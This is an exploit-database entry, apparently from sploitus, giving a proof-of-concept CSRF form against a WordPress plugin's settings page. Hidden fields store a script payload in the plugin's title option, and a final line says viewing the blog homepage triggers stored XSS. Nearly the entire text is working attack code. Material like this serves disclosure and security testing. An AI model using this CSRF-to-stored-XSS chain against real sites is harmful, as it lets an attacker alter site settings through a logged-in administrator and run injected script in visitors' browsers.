Share
## https://sploitus.com/exploit?id=WPEX-ID:AE50CEC9-5F80-4221-B6A8-4593AB66C37B
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=langbf" method="POST">
<input type="hidden" name="options_update" value="1" />
<input type="hidden" name="langbf_active" value="yes" />
<input type="hidden" name="langbf_title" value="<script>alert(/XSS/)</script>" />
<input type="hidden" name="langbf_position" value="top" />
<input type="hidden" name="langbf_side" value="left" />
<input type="hidden" name="langbf_disable_wpbar" value="yes" />
<input type="hidden" name="langbf_new_window" value="no" />
<input type="hidden" name="Submit" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Then view the homepage of the blog to trigger the XSS